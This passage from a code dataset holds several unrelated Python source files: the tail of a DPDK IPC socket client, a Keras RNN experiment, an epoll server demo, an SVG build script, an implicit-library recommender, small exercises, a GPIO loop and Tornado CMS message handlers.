file not found errors\n if e.errno != errno.ENOENT:\n raise\n return None\n\n\ndef find_sockets(path):\n \"\"\" Find any possible sockets to connect to and return them \"\"\"\n return glob.glob(os.path.join(path, SOCKET_NAME + '*'))\n\n\ndef print_socket_options(prefix, paths):\n \"\"\" Given a set of socket paths, give the commands needed to connect \"\"\"\n cmd = sys.argv[0]\n if prefix != DEFAULT_PREFIX:\n cmd += \" -f \" + prefix\n for s in sorted(paths):\n sock_name = os.path.basename(s)\n print(\"- {} # Connect with '{}'\".format(os.path.basename(s),\n cmd))\n\ndef get_dpdk_runtime_dir(fp):\n \"\"\" Using the same logic 
as in DPDK's EAL, get the DPDK runtime directory\n based on the file-prefix and user \"\"\"\n if (os.getuid() == 0):\n return os.path.join('/var/run/dpdk', fp)\n return os.path.join(os.environ.get('XDG_RUNTIME_DIR', '/tmp'), 'dpdk', fp)\n\n\ndef list_fp():\n \"\"\" List all available file-prefixes to user \"\"\"\n path = get_dpdk_runtime_dir('')\n sockets = glob.glob(os.path.join(path, \"*\", SOCKET_NAME + \"*\"))\n prefixes = []\n if not sockets:\n print(\"No LF apps with IPC enabled available\")\n else:\n print(\"Valid file-prefixes:\\n\")\n for s in sockets:\n prefixes.append(os.path.relpath(os.path.dirname(s), start=path))\n for p in sorted(set(prefixes)):\n print(p)\n print_socket_options(p, glob.glob(os.path.join(path, p,\n SOCKET_NAME + \"*\")))\n\n\ndef handle_socket(args, path, interactive=True):\n \"\"\" Connect to socket and handle user input \"\"\"\n prompt = '' # this evaluates to false in conditions\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)\n global CMDS\n\n if os.isatty(sys.stdin.fileno()):\n prompt = '--> '\n print(\"Connecting to \" + path)\n try:\n sock.connect(path)\n except OSError:\n print(\"Error connecting to \" + path)\n sock.close()\n # if socket exists but is bad, or if non-interactive just return\n if os.path.exists(path) or not prompt:\n return\n # if user didn't give a valid socket path, but there are\n # some sockets, help the user out by printing how to connect\n socks = find_sockets(os.path.dirname(path))\n if socks:\n print(\"\\nOther LF IPC sockets found:\")\n print_socket_options(args.file_prefix, socks)\n else:\n list_fp()\n return\n json_reply = read_socket_json(sock, 1024, prompt)\n output_buf_len = json_reply[\"max_output_len\"]\n app_name = get_app_name(json_reply[\"pid\"])\n if app_name and prompt:\n print('Connected to application: \"%s\"' % app_name)\n\n if interactive:\n # interactive prompt\n # get list of commands for readline completion\n sock.send(\"/\".encode())\n cmd_list = read_socket(sock, output_buf_len, False)\n CMDS = [cmd for cmd in cmd_list.split(CMDS_SEPERATOR) if len(cmd) > 0]\n print(CMDS)\n\n try:\n text = input(prompt).strip()\n while text != \"quit\":\n if text.startswith('/'):\n sock.send(text.encode())\n read_socket(sock, output_buf_len)\n text = input(prompt).strip()\n except EOFError:\n pass\n finally:\n sock.close()\n else:\n try:\n text = \"\"\n if (args.cmd):\n text += args.cmd\n if(args.params):\n text += \",\"\n text += args.params\n \n sock.send(text.encode())\n read_socket(sock, output_buf_len)\n finally:\n sock.close()\n\n\ndef readline_complete(text, state):\n \"\"\" Find any matching commands from the list based on user input \"\"\"\n all_cmds = ['quit'] + CMDS\n if text:\n matches = [c for c in all_cmds if c.startswith(text)]\n else:\n matches = all_cmds\n return matches[state]\n\n\nreadline.parse_and_bind('tab: complete')\nreadline.set_completer(readline_complete)\nreadline.set_completer_delims(readline.get_completer_delims().replace('/', ''))\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '--file-prefix', default=DEFAULT_PREFIX,\n help='Provide file-prefix for DPDK runtime directory')\nparser.add_argument('-i', '--instance', default='0', type=int,\n help='Provide instance number for DPDK application')\nparser.add_argument('-l', '--list', action=\"store_true\", default=False,\n help='List all possible file-prefixes and exit')\nparser.add_argument('--cmd', help='Provide command (disables interactive mode)')\nparser.add_argument('--params', help='Provide parameter (disables 
interactive mode)')\n\nargs = parser.parse_args()\nif args.list:\n list_fp()\n sys.exit(0)\nsock_path = os.path.join(get_dpdk_runtime_dir(args.file_prefix), SOCKET_NAME)\nif args.instance > 0:\n sock_path += \":{}\".format(args.instance)\n\nif args.cmd or args.params:\n handle_socket(args, sock_path, False)\nelse:\n handle_socket(args, sock_path)","sub_path":"usertools/lf-ipc.py","file_name":"lf-ipc.py","file_ext":"py","file_size_in_byte":6586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"37566939","text":"from __future__ import print_function\nfrom functools import reduce\n\n#import numpy as np\nimport numpy\nimport matplotlib.pyplot as plt\nimport pandas\nimport math\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import SimpleRNN\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n#from keras.utils.visualize_util import plot\n\nepochs_num=100\n\n# convert an array of values into a dataset matrix\ndef create_dataset(dataset, look_back=1):\n\tdataX, dataY = [], []\n\tfor i in range(len(dataset)-look_back-1):\n\t\ta = dataset[i:(i+look_back), 0]\n\t\tdataX.append(a)\n\t\tdataY.append(dataset[i + look_back, 0])\n\treturn numpy.array(dataX), numpy.array(dataY)\n\n# convert an array of values into a dataset matrix\ndef create_dataset_2(dataset_in, dataset_out, look_back=1):\n\tdataX, dataY = [], []\n\tfor i in range(len(dataset_in)-look_back-1):\n\t\ta = dataset_in[i:(i+look_back), 0]\n\t\tdataX.append(a)\n\t\tdataY.append(dataset_out[i + look_back, 0])\n\treturn numpy.array(dataX), numpy.array(dataY)\n\n\n\n# fix random seed for reproducibility\nnumpy.random.seed(7)\n\n# load the dataset\ndataframe = pandas.read_csv('international-airline-passengers.csv', usecols=[1], engine='python', skipfooter=3)\ndataset = dataframe.values\ndataset = dataset.astype('float32')\n# normalize the dataset\nscaler = MinMaxScaler(feature_range=(0, 1))\ndataset = scaler.fit_transform(dataset)\n# split into train and test sets\ntrain_size = int(len(dataset) * 0.67)\ntest_size = len(dataset) - train_size\nprint\nprint('dataset: ', dataset)\nprint\nprint('dataset.shape[0]: ', dataset.shape[0])\nprint('dataset.shape[1]: ', dataset.shape[1])\ntrain, test = dataset[0:train_size,:], dataset[train_size:len(dataset),:]\nprint\nprint('train: ', train)\nprint( 'test:', test)\nprint\n\n#def generate_dummy_dataset(samples_num):\n# in_value = 0.5\n# in_list = []\n# out_list = []\n# for iter in range(samples_num):\n# in_list.append([in_value])\n# out_list.append([in_value])\n# in_value += 1.0 / 1000\n# return (np.array(in_list), np.array(out_list))\n\n\n# Generate trainning samples\nimport SampleCreator as sc\ngen_dataset = sc.SampleCreator()\n(train_input_list, train_output_list) = gen_dataset.generate(100)\n(test_input_list, test_output_list) = gen_dataset.generate(100)\n# END OF Generate trainning samples\n#(train_input_list, train_output_list) = generate_dummy_dataset(100)\n#(test_input_list, test_output_list) = generate_dummy_dataset(100)\nprint\nprint('train_input_list',train_input_list)\nprint('train_output_list',train_output_list)\n\n\n# reshape into X=t and Y=t+1\nlook_back = 50\ntrainX, trainY = create_dataset(train, look_back)\ntestX, testY = create_dataset(test, look_back)\nprint\nprint('trainX', trainX)\nprint('trainY', trainY)\nprint\nprint('trainX.shape[0]', trainX.shape[0])\nprint\nprint('trainX.shape[1]', trainX.shape[1])\n\ntrainX, trainY 
= create_dataset_2(train_input_list, train_output_list, look_back)\ntestX, testY = create_dataset_2(test_input_list, test_output_list, look_back)\nprint\nprint('trainX', trainX)\nprint('trainY', trainY)\nprint\nprint('trainX.shape[0]', trainX.shape[0])\nprint\nprint('trainX.shape[1]', trainX.shape[1])\n\n\n# reshape input to be [samples, time steps, features]\ntrainX = numpy.reshape(trainX, (trainX.shape[0], trainX.shape[1], 1))\ntestX = numpy.reshape(testX, (testX.shape[0], testX.shape[1], 1))\nprint\n#print('trainX', trainX)\n\n# create and fit the LSTM network\nmodel = Sequential()\n#model.add(LSTM(4, input_dim=1))\nmodel.add(SimpleRNN(1, return_sequences=True, input_dim=1))\n#model.add(Dense(1))\nmodel.add(SimpleRNN(1))\n#model.compile(loss='mean_squared_error', optimizer='adam')\nmodel.compile(loss='mean_squared_error', optimizer='rmsprop')\n\n#plot(model, to_file='model_SimpleRNN_2layers_out=1_lb=2_TrEr0.16RMSE_TstEr0.26RMSE.png')\n\nmodel.fit(trainX, trainY, nb_epoch=epochs_num, batch_size=1, verbose=2)\n\n# make predictions\ntrainPredict = model.predict(trainX)\ntestPredict = model.predict(testX)\n\n# invert predictions\n#trainPredict = scaler.inverse_transform(trainPredict)\n#trainY = scaler.inverse_transform([trainY])\ntrainY = [trainY]\n#testPredict = scaler.inverse_transform(testPredict)\n#testY = scaler.inverse_transform([testY])\ntestY = [testY]\n\n# calculate root mean squared error\ntrainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))\nprint('Train Score: %.2f RMSE' % (trainScore))\ntestScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))\nprint('Test Score: %.2f RMSE' % (testScore))\n\n# shift train predictions for plotting\n#trainPredictPlot = numpy.empty_like(dataset)\n#trainPredictPlot[:, :] = numpy.nan\n#trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict\n\n# shift test predictions for plotting\n#testPredictPlot = numpy.empty_like(dataset)\n#testPredictPlot[:, :] = numpy.nan\n#testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict\n\n# plot baseline and predictions\nplt.figure(1)\nplt.title(\"look_back=%d TrEr=%.2fRMSE TstEr=%.2fRMSE\" % (look_back, trainScore, testScore))\nplt.subplot(311)\nplt.ylabel('Input')\nplt.plot(train_input_list)\n#plt.plot(train_output_list)\n#plt.plot(scaler.inverse_transform(dataset))\nplt.subplot(312)\nplt.ylabel('Train t(b) o(g)')\nplt.plot(train_output_list[3:])\nplt.plot(trainPredict)\nplt.subplot(313)\nplt.ylabel('Test t(b) o(g)')\nplt.xlabel('Sample series')\n#plt.plot(scaler.inverse_transform(test_input_list))\nplt.plot(test_output_list[3:])\nplt.plot(testPredict)\nplt.show()\n","sub_path":"keras/exp2-test.py","file_name":"exp2-test.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"126711527","text":"\"\"\"\n基于epoll的网络并发模型\n重点代码 !!\n\"\"\"\n\nfrom socket import *\nfrom select import *\n\n# 地址\nHOST = \"0.0.0.0\"\nPORT = 8888\nADDR = (HOST, PORT)\n\n\ndef main():\n # tcp套接字 连接客户端\n sock = socket()\n sock.bind(ADDR)\n sock.listen(5)\n print(\"Listen the port %d\" % PORT)\n\n # 防止IO处理过程中产生阻塞行为\n sock.setblocking(False)\n\n # 设置要监控的IO\n ep = epoll()\n ep.register(sock, EPOLLIN)\n\n # 查找字典 通过文件描述符 --》 IO对象\n map = {sock.fileno(): sock}\n\n # 循环接收客户端连接\n while True:\n events = ep.poll() # events->[(fileno,event)]\n print(\"你有新的IO需要处理哦\",events)\n # 逐个取值,分情况讨论\n for fd, event in events:\n if fd == sock.fileno():\n connfd, addr = map[fd].accept()\n 
print(\"Connect from\", addr)\n # 将客户端套接字添加到监控列表\n connfd.setblocking(False)\n ep.register(connfd, EPOLLIN|EPOLLET) # 设置触发\n map[connfd.fileno()] = connfd # 维护字典\n # else:\n # # 连接套接字就绪\n # data = map[fd].recv(1024).decode()\n # # 客户端退出\n # if not data:\n # ep.unregister(fd) # 不再监控\n # map[fd].close()\n # del map[fd] # 从字典删除\n # continue\n # print(data)\n # map[fd].send(b\"OK\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fancy_month02/day16_IO/day16_teacher/epoll_server.py","file_name":"epoll_server.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168440195","text":"import os\nfrom shutil import copy2\n\n\nrootdir = 'svg'\ndist = 'dist'\n\nfor subdir, dirs, files in os.walk(rootdir):\n for file in files:\n fileName = file.split('.')\n subSplit = subdir.split('/')\n\n newFilename = '.'\n seq = (subSplit[1], fileName[1])\n newFilename = newFilename.join(seq)\n # print(newFilename)\n oldPath = os.path.join(subdir, file)\n newPath = os.path.join(dist, fileName[0], newFilename)\n print(oldPath)\n print(newPath)\n\n if not os.path.exists(os.path.dirname(newPath)):\n try:\n os.makedirs(os.path.dirname(newPath))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n\n copy2(oldPath, newPath)\n # print os.path.join(subdir, file)","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"361279539","text":"import logging\nimport os\nimport argparse\nimport codecs\nimport time\nimport numpy as np\nimport tqdm\nimport pandas\nfrom scipy.sparse import coo_matrix\n\nfrom implicit.als import AlternatingLeastSquares\nfrom implicit.approximate_als import (AnnoyAlternatingLeastSquares, FaissAlternatingLeastSquares,\n NMSLibAlternatingLeastSquares)\nfrom implicit.bpr import BayesianPersonalizedRanking\nfrom implicit.lmf import LogisticMatrixFactorization\nfrom implicit.nearest_neighbours import (BM25Recommender, CosineRecommender,\n TFIDFRecommender, bm25_weight)\nfrom implicit.evaluation import ranking_metrics_at_k, train_test_split\n\n# maps command line model argument to class name\nMODELS = {\"als\": AlternatingLeastSquares,\n \"nmslib_als\": NMSLibAlternatingLeastSquares,\n \"annoy_als\": AnnoyAlternatingLeastSquares,\n \"faiss_als\": FaissAlternatingLeastSquares,\n \"tfidf\": TFIDFRecommender,\n \"cosine\": CosineRecommender,\n \"bpr\": BayesianPersonalizedRanking,\n \"lmf\": LogisticMatrixFactorization,\n \"bm25\": BM25Recommender}\n\n\ndef main():\n # setup args\n parser = argparse.ArgumentParser(description=\"\"\"Generates recommendations for each user.\nExpects the input data to be in format 'user_id\\tvideo_id\\tweight'.\nIf only --input provided it is used both for model fit and recommendations;\nuse --rec_input to provide a separate dataset for recommendations\n\"\"\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--rec_count\", type=int, default=300,\n dest=\"rec_count\", help=\"num of recommendations to generate\")\n parser.add_argument(\"--limit\", type=int, default=0,\n dest=\"limit\", help=\"limit num of users to generate recommendations for\")\n parser.add_argument(\"--input\", type=str, default=\"dataset.tsv\",\n dest=\"inputfile\", help=\"input file name\")\n parser.add_argument(\"--rec_input\", type=str, default=\"\",\n dest=\"rec_inputfile\", help=\"separate input file 
name for recommendations\")\n parser.add_argument(\"--output\", type=str, default=\"results.csv\",\n dest=\"outputfile\", help=\"output file name\")\n parser.add_argument(\"--gpu\", action=\"store_true\", help=\"use GPU (CUDA)\")\n parser.add_argument(\"--evaluate\", action=\"store_true\",\n help=\"evaluate (cross-validate) model after training\")\n parser.add_argument(\"--model\", type=str, default=\"als\",\n dest=\"model\", help=\"model to calculate (%s)\" % \"/\".join(MODELS.keys()))\n parser.add_argument(\"--log\", type=str, default=\"DEBUG\",\n dest=\"log\", help=\"logging level: CRITICAL|ERROR|WARNING|INFO|DEBUG\")\n args = parser.parse_args()\n\n # setup logging\n logging.basicConfig(level=args.log)\n\n # setup model\n model = get_model(args.model, args.gpu)\n\n # read dataset\n users, videos, weight_coo = read_dataset(args.inputfile)\n\n # prepare\n model, weight_coo = prepare(model, weight_coo)\n\n # if evaluation flag is set\n if args.evaluate:\n # need to split the dataset into (train, test) parts for cross-validation\n train_coo, test_coo = train_test_split(\n weight_coo, train_percentage=0.8)\n # convert test matrix to CSR\n test_csr = test_coo.tocsr()\n else:\n # otherwise use the whole `inputfile` dataset for training\n train_coo = weight_coo\n\n # convert train matrix to CSR\n train_csr = train_coo.tocsr()\n\n # train\n trained_model = train(model, train_csr)\n\n # evaluate\n if args.evaluate:\n evaluate(trained_model, train_csr, test_csr)\n\n # read the dataset for recommendations if it's different from the training one\n if args.rec_inputfile is not \"\" and args.rec_inputfile is not args.inputfile:\n users, videos, weight_coo = read_dataset(args.rec_inputfile)\n # prepare matrix\n model, weight_coo = prepare(model, weight_coo)\n\n # recommend\n calculate_recommendations(trained_model,\n users, videos, weight_coo.tocsr(), args.outputfile, args.rec_count, limit=args.limit)\n\n logging.info(\"Recommendations are written to '%s'\", args.outputfile)\n\n\ndef get_model(model_name, use_gpu=False):\n model_class = MODELS.get(model_name)\n if not model_class:\n raise ValueError(\"Unknown Model '%s'\" % model_name)\n\n # some default params as suggested by the author of Implicit\n if issubclass(model_class, AlternatingLeastSquares):\n params = {\"iterations\": 15, \"factors\": 32,\n \"dtype\": np.float32, \"use_gpu\": use_gpu}\n elif model_name == \"bm25\":\n params = {\"K1\": 100, \"B\": 0.5}\n elif model_name == \"bpr\":\n params = {\"factors\": 63, \"use_gpu\": use_gpu}\n elif model_name == \"lmf\":\n params = {\"factors\": 30, \"iterations\": 40, \"regularization\": 1.5}\n else:\n params = {}\n\n if issubclass(model_class, NMSLibAlternatingLeastSquares):\n # `post: 2` might be a nice way to potentially decrease evaluating / recommending time\n # while increasing index-building time (needs research)\n params[\"index_params\"] = {'M': 8, 'post': 0,\n 'efConstruction': 600}\n params[\"query_params\"] = {'ef': 300}\n\n return model_class(**params)\n\n\ndef read_dataset(filename):\n \"\"\" Reads the original dataset TSV as a pandas dataframe \"\"\"\n\n # read in triples of user_id/video_id/weight from the input dataset\n logging.info(\"Reading dataset '%s'...\", filename)\n start = time.time()\n data = pandas.read_table(filename,\n usecols=[0, 1, 2],\n names=[\"user\", \"video\", \"weight\"],\n na_filter=False)\n\n # map each video and user to a unique numeric value\n data[\"user\"] = data[\"user\"].astype(\"category\")\n data[\"video\"] = data[\"video\"].astype(\"category\")\n\n # 
create a sparse CSR matrix\n weight = coo_matrix((data[\"weight\"].astype(np.float32),\n (data[\"video\"].cat.codes.copy(),\n data[\"user\"].cat.codes.copy())))\n\n logging.debug(\"Read data file in %0.2fs\", time.time() - start)\n\n return np.array(data[\"user\"].cat.categories), np.array(data[\"video\"].cat.categories.astype(np.str)), weight\n\n\ndef train(model, weight_csr):\n \"\"\" Trains the model \"\"\"\n\n logging.debug(\"Training model %s\", model.__class__)\n start = time.time()\n model.fit(weight_csr)\n logging.debug(\"Trained model in %0.2fs\", time.time() - start)\n\n return model\n\n\ndef evaluate(trained_model, train_csr, test_csr):\n \"\"\" Evaluates the model \"\"\"\n\n logging.debug(\"Evaluating model...\")\n start = time.time()\n\n m = ranking_metrics_at_k(trained_model, train_csr.T.tocsr(),\n test_csr.T.tocsr(), K=1000, num_threads=0)\n logging.debug(\"Evaluated in in %0.2fs\", time.time() - start)\n logging.info(\"Evaluation metrics: %s\", m)\n\n\ndef calculate_recommendations(model, users, videos, weight_csr, output_filename, recs_count=10, limit=0):\n \"\"\" Generates video recommendations for each user in the dataset \"\"\"\n\n max_users = limit if limit > 0 else len(users)\n\n logging.info(\"Building recommendations for %s users with model of '%s'...\",\n max_users, model.__class__)\n start = time.time()\n weight = weight_csr.T.tocsr()\n with tqdm.tqdm(total=max_users) as progress:\n with codecs.open(output_filename, \"w\", \"utf8\") as o:\n c = 0\n for user_idx, user_id in enumerate(users):\n # if limit is set, respect it\n if c >= max_users:\n break\n c += 1\n video_ids = \"\"\n for video_idx, _score in model.recommend(user_idx, weight, N=recs_count):\n video_ids += \" \" + videos[video_idx]\n o.write(\"%s%s\\n\" %\n (user_id, video_ids))\n progress.update(1)\n logging.debug(\"Generated recommendations for %s users in %0.2fs\",\n max_users, time.time() - start)\n\n\ndef prepare(model, weight_coo):\n \"\"\" Prepares a model and a weight matrix in case of ALS \"\"\"\n\n # if we're training an ALS based model, weight input by bm25\n if issubclass(model.__class__, AlternatingLeastSquares):\n # Disable building approximate recommend index\n model.approximate_similar_items = False\n\n # Avoding bm25_weight seems to result in a better AUC, so comment block below for now\n # logging.debug(\"Weighting matrix by bm25_weight\")\n # weight_coo = bm25_weight(weight_coo, K1=100, B=0.8)\n\n return model, weight_coo\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":8802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"169258080","text":"def main():\n # escribe tu código abajo de esta línea\n\n jnuevos = int(input(\"Dame la cantidad de juegos nuevos \"))\n jusados = int(input(\"Dame la cantidad de juegos usados \"))\n\n totaljnuevos = jnuevos * 1000\n totaljusados = jusados * 350\n\n totalcompra= totaljnuevos + totaljusados\n\n print(\"El total de precio es\", totalcompra)\n\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/10Videojuego/src/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602331749","text":"\n\n#calss header\nclass _COMMUNICATIVE():\n\tdef __init__(self,): \n\t\tself.name = \"COMMUNICATIVE\"\n\t\tself.definitions = [u'willing to talk to people and give them information: ', 
u'relating to communication: ', u'relating to a style of language teaching in which interaction (= talking and responding) is seen as the most important method of learning, and the main aim of learning: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_communicative.py","file_name":"_communicative.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"389691434","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(2, GPIO.OUT)\n\ncontin = True\n\nwhile contin:\n val = str(input('Enter a letter: '))\n if val == 'A':\n print('HIGH')\n #GPIO.output(2, GPIO.HIGH)\n elif val == 'B':\n print('LOW')\n #GPIO.output(2, GPIO.LOW)\n elif val == 'Z':\n contin = False\n","sub_path":"Python/RPi.GPIO/exampleGPIO.py","file_name":"exampleGPIO.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422819694","text":"'''\n cms : content manager system\n manager group\n manager account\n manager message\n'''\nfrom __future__ import absolute_import, division, print_function, with_statement\n\n# Tornado framework\nimport tornado.web\nHTTPError = tornado.web.HTTPError\nfrom tornado.log import access_log, gen_log, app_log\n\nfrom handler.base import BaseHandler\n\nfrom common import util\n_now = util.now\n\nfrom config import settings\n\nfrom worker import msg\nfrom worker import manager\n\nimport os\nimport datetime\nimport collections\n\nfrom config import ueditor\n\n# json_encoder = util.json_encoder\njson_encoder = util.json_encoder\njson_decoder = util.json_decoder\n\nclass MainHandler(BaseHandler):\n '''\n '''\n def get(self):\n user = self.get_argument('manager', '') or self.get_argument('user', '')\n if user:\n token = self.get_argument('token')\n token, expired = token.split('|')\n token2 = util.token2(user, expired)\n if token != token2:\n raise HTTPError(400, reason='Abnormal token')\n self.render('index.html', groups=manager.check_location(user))\n else:\n self.redirect('login.html')\n\nclass PageHandler(BaseHandler):\n '''\n '''\n def get(self, page):\n '''\n Render html page\n '''\n page = page.lower()\n user = self.get_argument('manager', '') or self.get_argument('user', '')\n if user:\n # manager get it's messages\n token = self.get_argument('token')\n token, expired = token.split('|')\n token2 = util.token2(user, expired)\n if token != token2:\n raise HTTPError(400, reason='Abnormal token')\n \n group = manager.check_location(user)\n\n gmtypes = msg.get_gmtypes(group)\n self.render(page, groups=group, gmtypes=gmtypes)\n else:\n return self.render(page)\n\nclass AuthTokenHandler(BaseHandler):\n def check_token(self):\n user = self.get_argument('manager', '') or self.get_argument('user')\n if not user:\n raise HTTPError(400, reason='Missing manager argument')\n token = self.get_argument('token')\n\n manager.check_token(user, token)\n\n\nclass GMTypeHandler(AuthTokenHandler):\n def get(self, _id=''):\n user = self.get_argument('manager') or self.get_argument('user')\n self.check_token()\n group = manager.check_location(user)\n if _id:\n gmtype = msg.get_gmtype(group, _id)\n gmtypes = [gmtype, ]\n else:\n 
gmtypes = msg.get_gmtypes(group)\n\n        self.render_json_response(gmtypes=gmtypes, **self.OK)\n\n    def post(self, _id=''):\n        user = self.get_argument('manager') or self.get_argument('user')\n        self.check_token()\n        group = manager.check_location(user)\n        name = self.get_argument('name')\n        msg.create_gmtype(group, name)\n        self.render_json_response(**self.OK)\n\n    def put(self, _id=''):\n        if not _id:\n            raise HTTPError(400)\n        user = self.get_argument('manager') or self.get_argument('user')\n        self.check_token()\n        group = manager.check_location(user)\n        name = self.get_argument('name')\n        msg.update_gmtype(_id, group, name)\n        self.render_json_response(**self.OK)\n\n    def delete(self, _id=''):\n        user = self.get_argument('manager') or self.get_argument('user')\n        self.check_token()\n        group = manager.check_location(user)\n        msg.delete_gmtype(group, _id)\n        self.render_json_response(**self.OK)\n\nclass AccountHandler(BaseHandler):\n    '''\n    manager account login\n    '''\n    def post(self):\n        '''\n        manager login\n        '''\n        user = self.get_argument('manager', '') or self.get_argument('user')\n        if not user:\n            raise HTTPError(400, reason='Missing manager argument')\n        # password has been encrypted by md5\n        password = self.get_argument('password')\n\n        _user = manager.get_manager(user, password)\n        if not _user:\n            raise HTTPError(404, reason='can\\'t find account')\n\n        token = util.token(user)\n\n        _user.pop('password', '')\n\n        self.render_json_response(User=_user['name'], token=token, **self.OK)\n        access_log.info('{} logged in successfully'.format(_user['name']))\n\n# **************************************************\n#\n# Message handler\n#\n# **************************************************\nclass MessageHandler(AuthTokenHandler):\n    '''\n    maintain message\n    message type: \n        news\n        notices (use subtitle)\n        push to app notices (use subtitle)\n        recruit\n    '''\n    def render_messages(self, **kwargs):\n        '''\n        Encode dict and return response to client\n        '''\n        self.set_header('Access-Control-Allow-Origin', '*')\n        # origin = self.request.headers.get('Origin', '')\n        # # if origin and origin in settings['sites']:\n        # if origin:\n        #     self.set_header('Access-Control-Allow-Origin', origin)\n        callback = self.get_argument('callback', None)\n        # check whether a jsonp response should be returned\n        if callback:\n            self.set_status(200, kwargs.get('Msg', None))\n            self.finish('{}({})'.format(callback, json_encoder(kwargs)))\n        else:\n            self.set_status(kwargs['Code'], kwargs.get('Msg', None))\n            # self.set_header('Content-Type', 'application/json')\n            self.set_header('Content-Type', 'application/json;charset=utf-8')\n            self.finish(json_encoder(kwargs))\n\n    def render_message_response(self, message):\n        '''\n        return html|json based on the Accept header\n        '''\n        accept = self.request.headers.get('Accept', 'text/html')\n        if accept.startswith('application/json'):\n            self.render_json_response(Code=200, Msg='OK', **message)\n        else:\n            if self.is_mobile:\n                self.render('news.html', message=message)\n            else:\n                self.render('message.tmpt', message=message)\n\n    def get(self, _id=''):\n        '''\n        get message\n        '''\n        # logger.info('id: {}, {}'.format(_id, self.request))\n        if _id:\n            message = msg.get_message(_id)\n            if not message:\n                raise HTTPError(404, reason='Can\\'t find message')\n            return self.render_message_response(message)\n\n        # get messages \n        user = self.get_argument('manager', '') or self.get_argument('user', '')\n        groups, ismanager = 0, False\n        if user:\n            # manager gets its messages\n            token = self.get_argument('token')\n            token, expired = token.split('|')\n            token2 = util.token2(user, 
expired)\n if token != token2:\n raise HTTPError(400, reason='Abnormal token')\n groups = manager.check_location(user)\n ismanager = True\n else:\n # user get messages\n groups = self.get_argument('groups')\n label = self.get_argument('label', '')\n page = int(self.get_argument('page', 0))\n nums = int(self.get_argument('per', 10))\n mask = int(self.get_argument('mask', 0))\n gmtype = int(self.get_argument('gmtype', 0))\n isimg = int(self.get_argument('isimg', 0))\n expired = int(self.get_argument('expired', 0))\n ap_groups = self.get_argument('ap_groups', '')\n pos = page*nums\n\n messages = msg.get_messages(groups, mask, isimg, gmtype, label, expired, pos, nums, ismanager, ap_groups=ap_groups)\n # logger.info('messages: {}'.format(messages[0]['image']))\n isEnd = 1 if len(messages) < nums else 0\n\n # self.render_json_response(Code=200, Msg='OK', messages=messages, end=isEnd)\n self.render_messages(Code=200, Msg='OK', messages=messages, end=isEnd)\n\n def post(self, _id=''):\n '''\n create new message record\n title subtitle section mask author groups status ctime content image\n labels : labes are separate by ' '\n\n # add ap_groups field, if existed, create message to the special groups\n '''\n user = self.get_argument('manager', '') or self.get_argument('user')\n self.check_token()\n kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}\n kwargs['author'] = user\n kwargs.pop('token')\n kwargs.pop('manager')\n kwargs['groups'] = manager.check_location(user)\n\n if 'ap_groups' in kwargs:\n # split groups to list\n ap_groups = self.get_argument('ap_groups', '')\n kwargs['ap_groups'] = ap_groups.split(',')\n \n msg.create_message(**kwargs)\n self.render_json_response(**self.OK)\n\n def put(self, _id):\n '''\n update message record\n '''\n self.check_token()\n kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}\n kwargs.pop('token')\n kwargs.pop('manager')\n\n msg.update_message(_id, **kwargs)\n self.render_json_response(**self.OK)\n\n def delete(self, _id):\n self.check_token()\n msg.delete_message(_id)\n self.render_json_response(**self.OK)\n\nclass UeditorHandler(BaseHandler):\n '''\n support for ueditor upload images\n '''\n def get(self):\n self.set_header('Content-Type', 'application/json')\n self.finish(json_encoder(ueditor.config))\n\n def post(self):\n file_metas = self.request.files['upfile']\n\n filename, ext = '', '' \n for meta in file_metas:\n filename = meta['filename']\n content_type = meta['content_type']\n now = _now()\n mask = util.generate_password(8)\n md5 = util.md5(filename, content_type, now, mask)\n _id = md5.hexdigest().lower()\n\n msg.create_file(meta['body'], _id=_id, filename=filename, content_type=content_type)\n break\n if filename and _id:\n self.render_json_response(url='/fs/'+_id, title=filename, type=content_type, \n state='SUCCESS', **self.OK)\n else:\n raise HTTPError(400)\n\n# 